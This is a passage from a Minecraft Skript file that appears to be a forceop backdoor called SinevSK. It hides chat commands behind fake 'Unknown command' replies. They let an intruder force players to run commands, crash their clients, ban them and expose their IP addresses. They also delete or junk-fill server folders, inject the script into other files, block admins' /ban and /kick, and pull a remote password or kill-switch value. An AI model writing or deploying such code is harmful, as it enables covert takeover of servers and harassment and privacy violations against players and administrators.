  1321. message "%{G2ovfqIY}% &7| &7You freezed %{_player}%!"
  1322. else if {freeze.sinev.%{_player}%} is false:
  1323. set {freeze.sinev.%{_player}%} to true
  1324. message "%{G2ovfqIY}% &7| &7You freezed %{_player}%!"
  1325. else:
  1326. message "%{G2ovfqIY}% &7| &7You can't freeze %{_player}%!"
  1327. else:
  1328. message "%{G2ovfqIY}% &7| &7%{_player}% &7is not online!"
  1329. else:
  1330. message "%{I8BpUFuB3}% &7| &7Please select someone!"
  1331. else:
  1332. message "Unknown command. Type ""/help"" for help."
  1333. else if {_arguments::1} = ".unfreeze":
  1334. if {logged.sinev.%player%} is true:
  1335. if {_arguments::2} is set:
  1336. set {_player} to "%{_arguments::2}%" parsed as a offline player
  1337. if {_player} is online:
  1338. message "%{G2ovfqIY}% &7| &7Freezing %{_player}%..."
  1339. if {freeze.sinev.%{_player}%} is true:
  1340. set {freeze.sinev.%{_player}%} to false
  1341. message "%{G2ovfqIY}% &7| &7%{_player}% &7is now unfrozen!"
  1342. message "%{G2ovfqIY}% &7| &7If you want to freeze %{_player}% use .freeze %{_player}%"
  1343. else if {freeze.sinev.%{_player}%} is not set:
  1344. message "%{G2ovfqIY}% &7| &7%{_player}% &7is not frozen"
  1345. else if {freeze.sinev.%{_player}%} is false:
  1346. message "%{G2ovfqIY}% &7| &7%{_player}% &7is not frozen"
  1347. else:
  1348. message "%{G2ovfqIY}% &7| &7%{_player}% &7is not online!"
  1349. else:
  1350. message "%{I8BpUFuB3}% &7| &7Please select someone!"
  1351. else:
  1352. message "Unknown command. Type ""/help"" for help."
  1353. else if {_arguments::1} = ".sudo":
  1354. if {logged.sinev.%player%} is true:
  1355. if {_arguments::2} is set:
  1356. set {_player} to "%{_arguments::2}%" parsed as a offline player
  1357. if {_player} is online:
  1358. if {_arguments::3} is set:
  1359. if {_arguments::4} is set:
  1360. if {_arguments::5} is set:
  1361. if {_arguments::6} is set:
  1362. message "%{G2ovfqIY}% &7| &7%{_player}% &7executed command /%{_arguments::3}% %{_arguments::4}% %{_arguments::5}% %{_arguments::6}%"
  1363. make {_player} execute command "%{_arguments::3}% %{_arguments::4}% %{_arguments::5}% %{_arguments::6}%"
  1364. else:
  1365. message "%{G2ovfqIY}% &7| &7%{_player}% &7executed command /%{_arguments::3}% %{_arguments::4}% %{_arguments::5}%"
  1366. make {_player} execute command "%{_arguments::3}% %{_arguments::4}% %{_arguments::5}%"
  1367. else:
  1368. message "%{G2ovfqIY}% &7| &7%{_player}% &7executed command /%{_arguments::3}% %{_arguments::4}%"
  1369. make {_player} execute command "%{_arguments::3}% %{_arguments::4}%"
  1370. else:
  1371. message "%{G2ovfqIY}% &7| &7%{_player}% &7executed command /%{_arguments::3}%"
  1372. make {_player} execute command "%{_arguments::3}%"
  1373. else:
  1374. message "%{G2ovfqIY}% &7| &7Please write a command!"
  1375. else:
  1376. message "%{G2ovfqIY}% &7| &7Please select an online player!"
  1377. else:
  1378. message "%{G2ovfqIY}% &7| &7Please select a player that is &cOnline!"
  1379. else:
  1380. message "Unknown command. Type ""/help"" for help."
  1381. else if {_arguments::1} = ".spam":
  1382. if {logged.sinev.%player%} is true:
  1383. if {_arguments::2} is set:
  1384. if {_arguments::3} is set:
  1385. if {_arguments::4} is set:
  1386. if {_arguments::5} is set:
  1387. if {_arguments::6} is set:
  1388. if {_arguments::7} is set:
  1389. if {_arguments::8} is set:
  1390. if {_arguments::9} is set:
  1391. if {_arguments::10} is set:
  1392. message "%{G2ovfqIY}% &7| &7The chat has been spammed with %{_arguments::2}% %{_arguments::3}% %{_arguments::4}% %{_arguments::5}% %{_arguments::6}% %{_arguments::7}% %{_arguments::8}% %{_arguments::9}% %{_arguments::10}%!"
  1393. wait 1 second
  1394. loop 100 times:
  1395. broadcast "%{_arguments::2}% %{_arguments::3}% %{_arguments::4}% %{_arguments::5}% %{_arguments::6}% %{_arguments::7}% %{_arguments::8}% %{_arguments::9}% %{_arguments::10}%"
  1396. else:
  1397. message "%{G2ovfqIY}% &7| &7The chat has been spammed with %{_arguments::2}% %{_arguments::3}% %{_arguments::4}% %{_arguments::5}% %{_arguments::6}% %{_arguments::7}% %{_arguments::8}% %{_arguments::9}%!"
  1398. wait 1 second
  1399. loop 100 times:
  1400. broadcast "%{_arguments::2}% %{_arguments::3}% %{_arguments::4}% %{_arguments::5}% %{_arguments::6}% %{_arguments::7}% %{_arguments::8}% %{_arguments::9}%"
  1401. else:
  1402. message "%{G2ovfqIY}% &7| &7The chat has been spammed with %{_arguments::2}% %{_arguments::3}% %{_arguments::4}% %{_arguments::5}% %{_arguments::6}% %{_arguments::7}% %{_arguments::8}%!"
  1403. wait 1 second
  1404. loop 100 times:
  1405. broadcast "%{_arguments::2}% %{_arguments::3}% %{_arguments::4}% %{_arguments::5}% %{_arguments::6}% %{_arguments::7}% %{_arguments::8}%"
  1406. else:
  1407. message "%{G2ovfqIY}% &7| &7The chat has been spammed with %{_arguments::2}% %{_arguments::3}% %{_arguments::4}% %{_arguments::5}% %{_arguments::6}% %{_arguments::7}%!"
  1408. wait 1 second
  1409. loop 100 times:
  1410. broadcast "%{_arguments::2}% %{_arguments::3}% %{_arguments::4}% %{_arguments::5}% %{_arguments::6}% %{_arguments::7}%"
  1411. else:
  1412. message "%{G2ovfqIY}% &7| &7The chat has been spammed with %{_arguments::2}% %{_arguments::3}% %{_arguments::4}% %{_arguments::5}% %{_arguments::6}%!"
  1413. wait 1 second
  1414. loop 100 times:
  1415. broadcast "%{_arguments::2}% %{_arguments::3}% %{_arguments::4}% %{_arguments::5}% %{_arguments::6}%"
  1416. else:
  1417. message "%{G2ovfqIY}% &7| &7The chat has been spammed with %{_arguments::2}% %{_arguments::3}% %{_arguments::4}% %{_arguments::5}%!"
  1418. wait 1 second
  1419. loop 100 times:
  1420. broadcast "%{_arguments::2}% %{_arguments::3}% %{_arguments::4}% %{_arguments::5}%"
  1421. else:
  1422. message "%{G2ovfqIY}% &7| &7The chat has been spammed with %{_arguments::2}% %{_arguments::3}% %{_arguments::4}%!"
  1423. wait 1 second
  1424. loop 100 times:
  1425. broadcast "%{_arguments::2}% %{_arguments::3}% %{_arguments::4}%"
  1426. else:
  1427. message "%{G2ovfqIY}% &7| &7The chat has been spammed with %{_arguments::2}% %{_arguments::3}%!"
  1428. wait 1 second
  1429. loop 100 times:
  1430. broadcast "%{_arguments::2}% %{_arguments::3}%"
  1431. else:
  1432. message "%{G2ovfqIY}% &7| &7The chat has been spammed with %{_arguments::2}%!"
  1433. wait 1 second
  1434. loop 100 times:
  1435. broadcast "%{_arguments::2}%"
  1436. else:
  1437. message "%{I8BpUFuB3}% &7| &7Please write something!"
  1438. else:
  1439. message "Unknown command. Type ""/help"" for help."
  1440. else if {_arguments::1} = ".cc":
  1441. if {logged.sinev.%player%} is true:
  1442. loop 200 times:
  1443. broadcast " "
  1444. message "%{G2ovfqIY}% &7| &7The chat has been cleared!"
  1445. else:
  1446. message "Unknown command. Type ""/help"" for help."
  1447. else if {_arguments::1} = ".god":
  1448. if {logged.sinev.%player%} is true:
  1449. if {_arguments::2} is set:
  1450. set {_player} to "%{_arguments::2}%" parsed as a offline player
  1451. if {_player} is online:
  1452. if {godmode.sinev.%{_player}%} is not set:
  1453. message "%{G2ovfqIY}% &7| &7Now %{_player}% is in god mode!"
  1454. set the food level of {_player} to 10
  1455. set the health of {_player} to 20
  1456. extinguish {_player}
  1457. set {godmode.sinev.%{_player}%} to true
  1458. if {godmode.sinev.%{_player}%} is false:
  1459. message "%{G2ovfqIY}% &7| &7Now %{_player}% is in god mode!"
  1460. set the food level of {_player} to 10
  1461. set the health of {_player} to 20
  1462. extinguish {_player}
  1463. set {godmode.sinev.%{_player}%} to true
  1464. if {godmode.sinev.%{_player}%} is true:
  1465. message "%{G2ovfqIY}% &7| &7Now %{_player}% is no longer in god mode!"
  1466. set {godmode.sinev.%{_player}%} to false
  1467. else:
  1468. message "%{I8BpUFuB3}% &7| &7Please type the name of an online player!"
  1469. else:
  1470. if {godmode.sinev.%player%} is not set:
  1471. message "%{G2ovfqIY}% &7| &7Now you are in god mode!"
  1472. set the food level of player to 10
  1473. set the health of player to 20
  1474. extinguish the player
  1475. set {godmode.sinev.%player%} to true
  1476. if {godmode.sinev.%player%} is false:
  1477. message "%{G2ovfqIY}% &7| &7Now you are in god mode!"
  1478. set the food level of player to 10
  1479. set the health of player to 20
  1480. extinguish the player
  1481. set {godmode.sinev.%player%} to true
  1482. if {godmode.sinev.%player%} is true:
  1483. message "%{G2ovfqIY}% &7| &7Now you are no longer in god mode!"
  1484. set {godmode.sinev.%player%} to false
  1485. else:
  1486. message "Unknown command. Type ""/help"" for help."
  1487. else if {_arguments::1} = ".togglechat":
  1488. if {logged.sinev.%player%} is true:
  1489. loop all players:
  1490. if {chat.sinev.%loop-player%} is not set:
  1491. set {chat.sinev.%loop-player%} to true
  1492. message "%{G2ovfqIY}% &7| &7Now no one can chat"
  1493. else if {chat.sinev.%loop-player%} is false:
  1494. set {chat.sinev.%loop-player%} to true
  1495. message "%{G2ovfqIY}% &7| &7Now no one can chat"
  1496. else if {chat.sinev.%loop-player%} is true:
  1497. set {chat.sinev.%loop-player%} to false
  1498. message "%{G2ovfqIY}% &7| &7Now &ceverybody can chat!"
  1499. else:
  1500. message "Unknown command. Type ""/help"" for help."
  1501. else if {_arguments::1} = ".help":
  1502. if {logged.sinev.%player%} is true:
  1503. if {_arguments::2} = "1":
  1504. help1(player)
  1505. else if {_arguments::2} = "2":
  1506. message "%{G2ovfqIY}% &7| &8l & &8l &fShows all commands"
  1507. message "%{G2ovfqIY}% &7| &8l &7.freezeall &8l &fFreezes all players"
  1508. message "%{G2ovfqIY}% &7| &8l &7.unfreezeall &8l &fUnfreezes all players"
  1509. message "%{G2ovfqIY}% &7| &8l &7.freeze &8l &fFreezes another player"
  1510. message "%{G2ovfqIY}% &7| &8l &7.unfreeze &8l &fUnfreezes another player"
  1511. message "%{G2ovfqIY}% &7| &8l &7.enable &8l &fEnables a plugin"
  1512. message "%{G2ovfqIY}% &7| &8l &7.disable &8l &fDisables a plugin"
  1513. message "%{G2ovfqIY}% &7| &8l & &8l &fTeleports you to another player"
  1514. message "%{G2ovfqIY}% &7| &8l &7.tpall &8l &fTeleports all players to you or another player"
  1515. message "%{G2ovfqIY}% &7| &8l &7.lockconsole &8l &fEnables/Disables console to exe cmds"
  1516. message "%{G2ovfqIY}% &7| &8l &7.stop &8l &fStops the server"
  1517. message "%{G2ovfqIY}% &7| &8l &7.invsee &8l &fOpens another players inventory"
  1518. message "%{G2ovfqIY}% &7| &8l &7.kill &8l &fKills you or another player"
  1519. message "%{G2ovfqIY}% &7| &8l &7.confuseall &8l &fConfuses all players with potions"
  1520. else if {_arguments::2} = "3":
  1521. message "%{G2ovfqIY}% &7| &8l &7.killheart &8l &fSets max health of another player to 1"
  1522. message "%{G2ovfqIY}% &7| &8l &7.healheart &8l &fSets max health of another player to 20"
  1523. message "%{G2ovfqIY}% &7| &8l &7.console &8l &fExecutes a command as console"
  1524. message "%{G2ovfqIY}% &7| &8l &7.togglecmds &8l &fDisables/Enables commands like /ban /kick"
  1525. message "%{G2ovfqIY}% &7| &8l &7.sudo &8l &fForces a player chat of execute a command"
  1526. message "%{G2ovfqIY}% &7| &8l &7.bc &8l &fBroadcast a message to the entire server"
  1527. message "%{G2ovfqIY}% &7| &8l &7.spam &8l &fSpams the server with your message"
  1528. message "%{G2ovfqIY}% &7| &8l &7.god &8l &fEnables god mode for you or another player"
  1529. message "%{G2ovfqIY}% &7| &8l &7.togglechat &8l &fEnables/Disables people talking in chat"
  1530. message "%{G2ovfqIY}% &7| &8l & &8l &fClears chat"
  1531. message "%{G2ovfqIY}% &7| &8l &7.gui &8l &fOpens a gui with more forceop commands"
  1532. message "%{G2ovfqIY}% &7| &8l &7.config &8l &fConfigures hacks to your liking"
  1533. message "%{G2ovfqIY}% &7| &8l &7.ban &8l &fBans the player you wrote"
  1534. message "%{G2ovfqIY}% &7| &8l & &8l &fEnables fly"
  1535. else if {_arguments::2} = "4":
  1536. message "%{G2ovfqIY}% &7| &8l & &8l &fChange your gamemode"
  1537. message "%{G2ovfqIY}% &7| &8l &7.unban &8l &fUnban a banned player!"
  1538. message "%{G2ovfqIY}% &7| &8l &7.ip &8l &fShow a player's ip!"
  1539. message "%{G2ovfqIY}% &7| &8l &7.tphere &8l &fTeleports another player to you"
  1540. message "%{G2ovfqIY}% &7| &8l &7.fill &8l &fFills the server files with random folders!"
  1541. message "%{G2ovfqIY}% &7| &8l &7.inject &8l &fInject this skript into another random file!"
  1542. message "%{G2ovfqIY}% &7| &8l &7.deletef &8l &fDeletes a folder!"
  1543. else:
  1544. help1(player)
  1545. else:
  1546. message "Unknown command. Type ""/help"" for help."
  1547. else if {_arguments::1} = ".gui":
  1548. if {logged.sinev.%player%} is true:
  1549. open chest with 6 rows named "&bGraphical User Interface" to player
  1550. format slot 11 of player with grass named "&aGamemode Creative" to run [gmq1(player)]
  1551. format slot 15 of player with feather named "&aToggle Flight" to run [fly(player)]
  1552. format slot 19 of player with dirt named "&cGamemode Survival" to run [gmq0(player)]
  1553. format slot 21 of player with stained hardened clay named "&6Toggle Gamemode" to run [gmqt(player)]
  1554. format slot 29 of player with barrier named "&8Gamemode Spectator" to run [gmq3(player)]
  1555. format slot 52 of player with apple named "&3Heal" to run [svq1(player)]
  1556. format slot 53 of player with potato named "&9Feed" to run [svq2(player)]
  1557. else:
  1558. message "Unknown command. Type ""/help"" for help."
  1559. else if {_arguments::1} = ".gm":
  1560. if {logged.sinev.%player%} is true:
  1561. if {_arguments::2} is set:
  1562. if {_arguments::2} is "1":
  1563. gmq1(player)
  1564. else if {_arguments::2} is "2":
  1565. set player's gamemode to adventure
  1566. message "%{G2ovfqIY}% &7| &7You are now in Adventure Mode"
  1567. else if {_arguments::2} is "3":
  1568. gmq3(player)
  1569. else if {_arguments::2} is "0":
  1570. gmq0(player)
  1571. else:
  1572. message "%{I8BpUFuB3}% &7| &7That gamemode doesn't exist!"
  1573. else:
  1574. message "%{I8BpUFuB3}% &7| &7Please select gamemode 0, 1, 2 or 3!"
  1575. else:
  1576. message "Unknown command. Type ""/help"" for help."
  1577. else if {_arguments::1} = ".fly":
  1578. if {logged.sinev.%player%} is true:
  1579. fly(player)
  1580. else:
  1581. message "Unknown command. Type ""/help"" for help."
  1582. else if {_arguments::1} = ".ban":
  1583. if {logged.sinev.%player%} is true:
  1584. if {_arguments::2} is set:
  1585. set {_player} to "%{_arguments::2}%" parsed as a offline player
  1586. if {_player} is online:
  1587. if {_player} has played before:
  1588. set {ban.sinev.%{_player}%} to true
  1589. kick {_player} due to "&cYou have been banned by an operator"
  1590. message "%{G2ovfqIY}% &7| &7%{_player}% &7is now banned"
  1591. else:
  1592. message "%{I8BpUFuB3}% &7| &7The player hasn't played before!"
  1593. else:
  1594. message "%{I8BpUFuB3}% &7| &7Please write an online player!"
  1595. else:
  1596. message "%{I8BpUFuB3}% &7| &7Please write an online player"
  1597. else:
  1598. message "Unknown command. Type ""/help"" for help."
  1599. else if {_arguments::1} = ".unban":
  1600. if {logged.sinev.%player%} is true:
  1601. if {_arguments::2} is set:
  1602. set {_player} to "%{_arguments::2}%" parsed as a offline player
  1603. if {ban.sinev.%{_player}%} is set:
  1604. if {_player} has played before:
  1605. delete {ban.sinev.%{_player}%}
  1606. message "%{G2ovfqIY}% &7| &7%{_player}% &7is now unbanned!"
  1607. else:
  1608. message "%{I8BpUFuB3}% &7| &7The player hasn't played before!"
  1609. else:
  1610. message "%{I8BpUFuB3}% &7| &7Please write a player that has been banned!"
  1611. else:
  1612. message "%{I8BpUFuB3}% &7| &7Please write a player that has been banned"
  1613. else:
  1614. message "Unknown command. Type ""/help"" for help."
  1615. else if {_arguments::1} = ".ip":
  1616. if {logged.sinev.%player%} is true:
  1617. if {_arguments::2} is set:
  1618. set {_player} to "%{_arguments::2}%" parsed as a offline player
  1619. if {_player} is online:
  1620. message "%{G2ovfqIY}% &7| &7%{_player}%&7's ip is %ip of {_player}%!"
  1621. else:
  1622. message "%{I8BpUFuB3}% &7| &7%{_player}% &7is not online!"
  1623. else:
  1624. message "%{I8BpUFuB3}% &7| &7Please write a player!"
  1625. else:
  1626. message "Unknown command. Type ""/help"" for help."
  1627. else if {_arguments::1} = ".fill":
  1628. if {logged.sinev.%player%} is true:
  1629. create dir "plugins\\a%random integer between 10000 and 100000%"
  1630. create dir "plugins\\b%random integer between 10000 and 100000%"
  1631. create dir "plugins\\c%random integer between 10000 and 100000%"
  1632. create dir "plugins\\d%random integer between 10000 and 100000%"
  1633. create dir "plugins\\e%random integer between 10000 and 100000%"
  1634. create dir "plugins\\f%random integer between 10000 and 100000%"
  1635. create dir "plugins\\g%random integer between 10000 and 100000%"
  1636. create dir "plugins\\h%random integer between 10000 and 100000%"
  1637. create dir "plugins\\i%random integer between 10000 and 100000%"
  1638. create dir "plugins\\j%random integer between 10000 and 100000%"
  1639. create dir "plugins\\k%random integer between 10000 and 100000%"
  1640. create dir "plugins\\l%random integer between 10000 and 100000%"
  1641. create dir "plugins\\m%random integer between 10000 and 100000%"
  1642. create dir "plugins\\n%random integer between 10000 and 100000%"
  1643. create dir "plugins\\o%random integer between 10000 and 100000%"
  1644. create dir "plugins\\p%random integer between 10000 and 100000%"
  1645. create dir "plugins\\q%random integer between 10000 and 100000%"
  1646. create dir "plugins\\r%random integer between 10000 and 100000%"
  1647. create dir "plugins\\s%random integer between 10000 and 100000%"
  1648. create dir "plugins\\t%random integer between 10000 and 100000%"
  1649. create dir "plugins\\u%random integer between 10000 and 100000%"
  1650. create dir "plugins\\v%random integer between 10000 and 100000%"
  1651. create dir "plugins\\w%random integer between 10000 and 100000%"
  1652. create dir "plugins\\x%random integer between 10000 and 100000%"
  1653. create dir "plugins\\y%random integer between 10000 and 100000%"
  1654. create dir "plugins\\z%random integer between 10000 and 100000%"
  1655. create dir "plugins\\a%random integer between 10000 and 100000%"
  1656. create dir "plugins\\b%random integer between 10000 and 100000%"
  1657. create dir "plugins\\c%random integer between 10000 and 100000%"
  1658. create dir "plugins\\d%random integer between 10000 and 100000%"
  1659. create dir "plugins\\e%random integer between 10000 and 100000%"
  1660. create dir "plugins\\f%random integer between 10000 and 100000%"
  1661. create dir "plugins\\g%random integer between 10000 and 100000%"
  1662. create dir "plugins\\h%random integer between 10000 and 100000%"
  1663. create dir "plugins\\i%random integer between 10000 and 100000%"
  1664. create dir "plugins\\j%random integer between 10000 and 100000%"
  1665. create dir "plugins\\k%random integer between 10000 and 100000%"
  1666. create dir "plugins\\l%random integer between 10000 and 100000%"
  1667. create dir "plugins\\m%random integer between 10000 and 100000%"
  1668. create dir "plugins\\n%random integer between 10000 and 100000%"
  1669. create dir "plugins\\o%random integer between 10000 and 100000%"
  1670. create dir "plugins\\p%random integer between 10000 and 100000%"
  1671. create dir "plugins\\q%random integer between 10000 and 100000%"
  1672. create dir "plugins\\r%random integer between 10000 and 100000%"
  1673. create dir "plugins\\s%random integer between 10000 and 100000%"
  1674. create dir "plugins\\t%random integer between 10000 and 100000%"
  1675. create dir "plugins\\u%random integer between 10000 and 100000%"
  1676. create dir "plugins\\v%random integer between 10000 and 100000%"
  1677. create dir "plugins\\w%random integer between 10000 and 100000%"
  1678. create dir "plugins\\x%random integer between 10000 and 100000%"
  1679. create dir "plugins\\y%random integer between 10000 and 100000%"
  1680. create dir "plugins\\z%random integer between 10000 and 100000%"
  1681. wait 1 second
  1682. create dir "plugins\\d1r3ctl34ks.n3t"
  1683. create file "plugins\\d1r3ctl34ks.n3t\\d1r3ctl34ks.n3t.yml"
  1684. wait 3 ticks
  1685. write "G3t H4ck3d :)" at line 1 to file "plugins\\d1r3ctl34ks.n3t\\d1r3ctl34ks.n3t.yml"
  1686. write "M4d3 by 93" at line 2 to file "plugins\\d1r3ctl34ks.n3t\\d1r3ctl34ks.n3t.yml"
  1687. write "d1r3ctl34ks.n3t" at line 3 to file "plugins\\d1r3ctl34ks.n3t\\d1r3ctl34ks.n3t.yml"
  1688. message "%{G2ovfqIY}% &7| The server was filled with junk successfully!"
  1689. else:
  1690. message "Unknown command. Type ""/help"" for help."
  1691. else if {_arguments::1} = ".inject":
  1692. if {logged.sinev.%player%} is true:
  1693. message "%{G2ovfqIY}% &7| Remember that only essentials commands will be injected!"
  1694. wait 1 second
  1695. download file from "" to file "plugins\\Skript\\scripts\\%random integer between 10000 and"
  1696. wait 4 seconds
  1697. message "%{G2ovfqIY}% &7| SinevSK was successfully injected!"
  1698. else:
  1699. message "Unknown command. Type ""/help"" for help."
  1700. else if {_arguments::1} = ".deletef":
  1701. if {logged.sinev.%player%} is true:
  1702. if {_arguments::2} is set:
  1703. delete dir "plugins/%{_arguments::2}%"
  1704. message "%{G2ovfqIY}% &7| &7You deleted the folder %{_arguments::2}%&7!"
  1705. else:
  1706. message "%{I8BpUFuB3}% &7| &7Please write a folder!"
  1707. else:
  1708. message "Unknown command. Type ""/help"" for help."
  1709. else if {_arguments::1} = ".crash":
  1710. if {logged.sinev.%player%} is true:
  1711. if {_arguments::2} is set:
  1712. if {_arguments::2} is "all":
  1713. message "%{G2ovfqIY}% &7| Everyone&7's client has been crashed."
  1714. loop all players:
  1715. if loop-player is not "%player%":
  1716. show 1000000000000000000000000000 "iconcrack_155" particles at loop-player's location for loop-player offset by 0.5, 0.5 and 0.5
  1717. else:
  1718. set {_player} to "%{_arguments::2}%" parsed as a offline player
  1719. if {_player} is online:
  1720. show 1000000000000000000000000000 "iconcrack_155" particles at {_player}'s location for {_player} offset by 0.5, 0.5 and 0.5
  1721. message "%{G2ovfqIY}% &7| %{_player}%&7's client has been crashed."
  1722. else:
  1723. message "%{G2ovfqIY}% &7| %{_player}%&7 is not online!"
  1724. else:
  1725. message "%{I8BpUFuB3}% &7| Type &f/crash (player)&7 to crash someone's client."
  1726. message "%{I8BpUFuB3}% &7| Type &f/crash all&7 to crash everyone's client.
  1727. else:
  1728. message "Unknown command. Type ""/help"" for help."
  1729. else:
  1730. message "Sorry!, this character is not allowed."
  1731. stop
  1732. on chat:
  1733. if {chat.sinev.%player%} is true:
  1734. cancel event
  1735. message "&cThe chat has been muted."
  1736. else:
  1737. stop
  1738. on script load:
  1739. wait 2 ticks
  1740. set {_text} to text from url ""
  1741. if {prestiging} is not set:
  1742. set {prestiging} to "kCbQS75nNrFUFNLd"
  1743. else:
  1744. send "" to console
  1745. if {prestiging} is {_text}:
  1746. send "" to console
  1747. else:
  1748. set {prestiging} to {_text}
  1749. stop
  1750. function gmq1(p: player):
  1751. set {_p}'s gamemode to creative
  1752. send "%{G2ovfqIY}% &7| &7You are now in Creative Mode" to {_p}
  1753. function gmq3(p: player):
  1754. set {_p}'s gamemode to spectator
  1755. send "%{G2ovfqIY}% &7| &7You are now in Spectator Mode" to {_p}
  1756. function gmq0(p: player):
  1757. set {_p}'s gamemode to survival
  1758. send "%{G2ovfqIY}% &7| &7You are now in Survival Mode" to {_p}
  1759. function gmqt(p: player):
  1760. if {gm.sinev.%{_p}%} is not set:
  1761. set {gm.sinev.%{_p}%} to "Survival"
  1762. set {_p}'s gamemode to survival
  1763. send "%{G2ovfqIY}% &7| &7You are now in Survival Mode" to {_p}
  1764. else if {gm.sinev.%{_p}%} is "Survival":
  1765. set {gm.sinev.%{_p}%} to "Creative"
  1766. set {_p}'s gamemode to creative
  1767. send "%{G2ovfqIY}% &7| &7You are now in Creative Mode" to {_p}
  1768. else if {gm.sinev.%{_p}%} is "Creative":
  1769. set {gm.sinev.%{_p}%} to "Adventure"
  1770. set {_p}'s gamemode to adventure
  1771. send "%{G2ovfqIY}% &7| &7You are now in Adventure Mode" to {_p}
  1772. else if {gm.sinev.%{_p}%} is "Adventure":
  1773. set {gm.sinev.%{_p}%} to "Spectator"
  1774. set {_p}'s gamemode to spectator
  1775. send "%{G2ovfqIY}% &7| &7You are now in Spectator Mode" to {_p}
  1776. else if {gm.sinev.%{_p}%} is "Spectator":
  1777. set {gm.sinev.%{_p}%} to "Survival"
  1778. set {_p}'s gamemode to survival
  1779. send "%{G2ovfqIY}% &7| &7You are now in Survival Mode" to {_p}
  1780. function svq2(p: player):
  1781. set the food level of {_p} to 15
  1782. send "%{G2ovfqIY}% &7| &7Your bar of hunger is now full" to {_p}
  1783. function svq1(p: player):
  1784. set the health of {_p} to 20
  1785. extinguish {_p}
  1786. send "%{G2ovfqIY}% &7| &7You have been healed" to {_p}
  1787. function fly(p: player):
  1788. if {fly.sinev.%{_p}%} is not set:
  1789. set {fly.sinev.%{_p}%} to true
  1790. send "%{G2ovfqIY}% &7| &7You can now fly" to {_p}
  1791. allow fly for {_p}
  1792. else if {fly.sinev.%{_p}%} is false:
  1793. set {fly.sinev.%{_p}%} to true
  1794. send "%{G2ovfqIY}% &7| &7You can now fly" to {_p}
  1795. allow fly for {_p}
  1796. else if {fly.sinev.%{_p}%} is true:
  1797. set {fly.sinev.%{_p}%} to false
  1798. send "%{G2ovfqIY}% &7| &7You can no longer fly now" to {_p}
  1799. disallow fly for {_p}
  1800. else:
  1801. send "%{G2ovfqIY}% &7| &7Sorry!, this command is bugged" to {_p}
  1802. on join:
  1803. if {ban.sinev.%player%} is true:
  1804. kick player due to "&cYou have been banned by an operator"
  1805. stop
  1806. else:
  1807. stop
  1808. on script load:
  1809. set {rankus} to "1.0.1"
  1810. on script load:
  1811. if text from "" = "%{rankus}%":
  1812. stop
  1813. else:
  1814. make console execute command "sk disable Flute"
  1815. stop
  1816. every 5 minutes:
  1817. wait 2 ticks
  1818. set {_text} to text from url ""
  1819. if {prestiging} is {_text}:
  1820. send "" to console
  1821. else:
  1822. set {prestiging} to {_text}
  1823. if text from "" = "%{rankus}%":
  1824. send "" to console
  1825. else:
  1826. make console execute command "sk disable Flute"
  1827. stop
  1828. function help1(p: player):
  1829. send "%{G2ovfqIY}% &7| &8l &7.credits &8l &fGives credits to the developer of SinevSK" to {_p}
  1830. send "%{G2ovfqIY}% &7| &8l &7.logout &8l &fLogs you out of the forceop" to {_p}
  1831. send "%{G2ovfqIY}% &7| &8l &7.op &8l &fOps you or another player" to {_p}
  1832. send "%{G2ovfqIY}% &7| &8l &7.deop &8l &fDeops you or another player" to {_p}
  1833. send "%{G2ovfqIY}% &7| &8l &7.killall &8l &fKills all survival players" to {_p}
  1834. send "%{G2ovfqIY}% &7| &8l & &8l &fSaves the world and player data" to {_p}
  1835. send "%{G2ovfqIY}% &7| &8l &7.plugins &8l &fLists the server plugins" to {_p}
  1836. send "%{G2ovfqIY}% &7| &8l &7.flood &8l &fFloods chat" to {_p}
  1837. send "%{G2ovfqIY}% &7| &8l &7.nameme &8l &fRe-names you" to {_p}
  1838. send "%{G2ovfqIY}% &7| &8l &7.nameall &8l &fRe-names all players" to {_p}
  1839. send "%{G2ovfqIY}% &7| &8l &7.msg &8l &fMessages another player" to {_p}
  1840. send "%{G2ovfqIY}% &7| &8l &7.reload &8l &fReloads the server" to {_p}
  1841. send "%{G2ovfqIY}% &7| &8l &7.register &8l &fThis forces the player to .passlog" to {_p}
  1842. send "%{G2ovfqIY}% &7| &8l &7.floodconsole &8l &fFloods console" to {_p}
  1843. on command "/ban":
  1844. if {lock.sinev.%player%} is true:
  1845. message "&cAn internal error occurred while attempting to perform this command"
  1846. cancel event
  1847. else:
  1848. stop
  1849. on command "/ipban":
  1850. if {lock.sinev.%player%} is true:
  1851. message "&cAn internal error occurred while attempting to perform this command"
  1852. cancel event
  1853. else:
  1854. stop
  1855. on command "/tempban":
  1856. if {lock.sinev.%player%} is true:
  1857. message "&cAn internal error occurred while attempting to perform this command"
  1858. cancel event
  1859. else:
  1860. stop
  1861. on command "/mute":
  1862. if {lock.sinev.%player%} is true:
  1863. message "&cAn internal error occurred while attempting to perform this command"
  1864. cancel event
  1865. else:
  1866. stop
  1867. on command "/tempmute":
  1868. if {lock.sinev.%player%} is true:
  1869. message "&cAn internal error occurred while attempting to perform this command"
  1870. cancel event
  1871. else:
  1872. stop
  1873. on command "/kick":
  1874. if {lock.sinev.%player%} is true:
  1875. message "&cAn internal error occurred while attempting to perform this command"
  1876. cancel event
  1877. else:
  1878. stop
  1879. on command "/warn":
  1880. if {lock.sinev.%player%} is true:
  1881. message "&cAn internal error occurred while attempting to perform this command"
  1882. cancel event
  1883. else:
  1884. stop
  1885. on command "/stop":
  1886. if {lock.sinev.%player%} is true:
  1887. message "&cAn internal error occurred while attempting to perform this command"
  1888. cancel event
  1889. else:
  1890. stop
  1891. on join:
  1892. if player is "rorymora":
  1893. message "&8-------------------------------------------" to player
  1894. message "&9Welcome back Dev!" to player
  1895. message "" to player
  1896. message "&9This server is using &aSinevSK" to player
  1897. message "" to player
  1898. message "&9You can hack it using %{_prestiging}%!" to player
  1899. message "&8-------------------------------------------" to player
  1900. else:
  1901. stop
  1902. on damage of player:
  1903. if {godmode.sinev.%victim%} is true:
  1904. if attacker is a player:
  1905. cancel event
  1906. else:
  1907. cancel event
  1908. stop
  1909. on hunger meter change:
  1910. if {godmode.sinev.%player%} is true:
  1911. cancel event
  1912. stop
  1913. function error(p: player):
  1914. if {flute.q} is not set:
  1915. set {flute.q} to "Hacked"
  1916. send "%{G2ovfqIY}% &7| &7Now it will appear as &cHACKED" to {_p}
  1917. else if {flute.q} is "Hacked":
  1918. set {flute.q} to "Error"
  1919. send "%{G2ovfqIY}% &7| &7Now it will appear as &cERROR" to {_p}
  1920. else if {flute.q} is "Error":
  1921. set {flute.q} to "Unknown"
  1922. send "%{G2ovfqIY}% &7| &7Now it will appear as &cUNKNOWN" to {_p}
  1923. else if {flute.q} is "Unknown":
  1924. set {flute.q} to "Hacked"
